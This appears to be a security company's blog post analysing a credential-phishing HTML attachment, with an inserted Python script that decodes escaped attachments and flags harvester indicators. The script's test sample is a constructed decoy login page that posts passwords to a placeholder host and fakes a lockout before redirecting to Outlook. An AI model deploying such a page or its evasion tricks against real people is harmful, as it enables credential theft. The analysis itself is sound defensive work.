MegaplanIT
Security & Compliance
Active Threat Investigations - June 2021
Active Threat – Credential Stealing Email Located
We recently had a phishing investigation into an email with an HTML attachment that caught our eye. The reason is that Microsoft had just posted about an ongoing attack from NOBELIUM that used a delivery technique similar to the one in this investigation. The NOBELIUM attack structure was Phishing Email > HTML attachment > HTML Smuggling > Drop an ISO, which drops an LNK file that executes the Cobalt Strike Beacon loader. There is more to it than that, but luckily the HTML smuggling step is where this attack's path diverged from NOBELIUM's.
After we obtained the email from the client, we dug into what was going on inside the HTML attachment. The HTML was "obfuscated", though only in the sense that the characters in the document had been escaped, something that is common in web requests. We recovered the plaintext of the document trivially and started to dig deeper into its functionality.
There were quite a few interesting things to note in this phishing campaign. The adversary went to some lengths to avoid alerting the user that their credentials were in fact being stolen. If a user reloaded the page more than 3 times, the document would say "Scanned File Locked! Redirecting you back to your account" and would then take them back to Outlook. It would also prompt the user twice to enter their password, telling them it was wrong each time (a smart touch, since many people mistype their password on the first attempt); on the third attempt it would say "Scanned File Locked" and redirect them back to their Outlook page. The JavaScript on the page also dynamically pulled the targeted company's logo from a website called Statvoo.com, based on the domain name of the targeted user, to make the attack even more convincing. The website that the credentials are sent to was created on 5-19-2021 and is hosting a default WordPress page with no content on it. We have since reported the site to the hosting provider and are waiting for it to be taken down.
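The two analyst steps described above, recovering the plaintext from the escaped attachment and then pulling out the indicators that mark a credential harvester (a password field, where the form posts, a remote logo lookup, the lockout message and the redirect), can be scripted. The following Python is an added example, not MegaplanIT's tooling and not the attachment from this case; the sample attachment, the host names and the messages in it are constructed for the demonstration.

```python
"""Analyst triage for an HTML email attachment that hides a login form
behind JavaScript string escaping.  Added example; not MegaplanIT's tooling
and not the attachment from this investigation."""
import json
import re
from urllib.parse import quote, unquote, urlparse

# Constructed sample: a decoy login page percent-encoded inside unescape(),
# the same wrapping pattern as the attachment described above.  All hosts
# and messages here are made up for the demonstration.
DECOY_PLAIN = (
    '<html><body>'
    '<img src="https://logo-lookup.example/favicon/victim.example">'
    '<form method="POST" action="https://harvest.example/wp-content/post.php">'
    '<input type="email" name="user" value="victim@victim.example">'
    '<input type="password" name="pass"><input type="submit"></form>'
    '<script>var tries=0;function bad(){tries++;if(tries>2){'
    'alert("Scanned File Locked! Redirecting you back to your account");'
    'window.location="https://outlook.office.com/";}}</script>'
    '</body></html>'
)
SAMPLE_ATTACHMENT = (
    '<script>document.write(unescape("%s"));</script>'
    % quote(DECOY_PLAIN, safe="")
)

UNESCAPE_CALL = re.compile(r'unescape\(\s*["\']([^"\']*)["\']\s*\)')
PCT_TRIPLET = re.compile(r'%[0-9A-Fa-f]{2}')
HEX_ESC = re.compile(r'\\x([0-9A-Fa-f]{2})')
UNI_ESC = re.compile(r'\\u([0-9A-Fa-f]{4})')


def decode_layers(text, max_rounds=5):
    """Peel escaping until the text stops changing.

    Handles unescape("%3C...") wrappers, JS \\xNN and \\uNNNN string escapes,
    and a document that is percent-encoded end to end.  A blanket unquote()
    is only applied when most of the text is %XX triplets, so a legitimate
    '%' in ordinary content is left alone.
    """
    for _ in range(max_rounds):
        new = UNESCAPE_CALL.sub(lambda m: unquote(m.group(1)), text)
        new = HEX_ESC.sub(lambda m: chr(int(m.group(1), 16)), new)
        new = UNI_ESC.sub(lambda m: chr(int(m.group(1), 16)), new)
        if len(PCT_TRIPLET.findall(new)) * 3 > len(new) // 2:
            new = unquote(new)
        if new == text:
            break
        text = new
    return text


# Indicators pulled from the decoded markup.  Regexes rather than a full
# HTML parser so that a form sitting inside a document.write() still counts.
FORM_ACTION = re.compile(r'<form[^>]*\baction\s*=\s*["\']([^"\']+)', re.I)
XHR_TARGET = re.compile(
    r'(?:\bfetch|\.open)\s*\(\s*(?:["\'][A-Za-z]+["\']\s*,\s*)?'
    r'["\'](https?://[^"\']+)', re.I)
PASSWORD_INPUT = re.compile(r'<input[^>]*\btype\s*=\s*["\']?password', re.I)
IMG_SRC = re.compile(r'<img[^>]*\bsrc\s*=\s*["\']([^"\']+)', re.I)
REDIRECT = re.compile(r'(?:window\.)?location(?:\.href)?\s*=\s*["\']([^"\']+)')
LOCKOUT_TEXT = re.compile(r'Scanned File Locked|Redirecting you back', re.I)


def hosts(urls):
    """Distinct host names from a list of URLs, ignoring relative paths."""
    return sorted({urlparse(u).netloc for u in urls if urlparse(u).netloc})


def triage(attachment_text):
    """Return the indicators an analyst wants before deciding on a reset."""
    html = decode_layers(attachment_text)
    post_hosts = hosts(FORM_ACTION.findall(html) + XHR_TARGET.findall(html))
    password_fields = len(PASSWORD_INPUT.findall(html))
    if password_fields and post_hosts:
        verdict = "likely credential harvester"
    elif password_fields:
        verdict = "password field found; POST target not visible, review manually"
    else:
        verdict = "no credential form found"
    return {
        "decoded": html != attachment_text,
        "password_fields": password_fields,
        "credential_post_hosts": post_hosts,
        "remote_logo_hosts": hosts(IMG_SRC.findall(html)),
        "redirect_targets": REDIRECT.findall(html),
        "lockout_message": bool(LOCKOUT_TEXT.search(html)),
        "verdict": verdict,
    }


if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_ATTACHMENT), indent=2))
```

The `credential_post_hosts` list is what goes to the hosting-provider report and the mail filter block list, and `remote_logo_hosts` is where a lookup service such as the one used in this campaign would show up. The decoder deliberately stops after a bounded number of rounds and never runs a blanket `unquote()` over ordinary text, so a benign attachment that happens to contain a percent sign is not mangled into a false positive.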
We did not find any evidence of malware or dropper functionality inside the HTML file, so our recommendation was to change the affected users' passwords.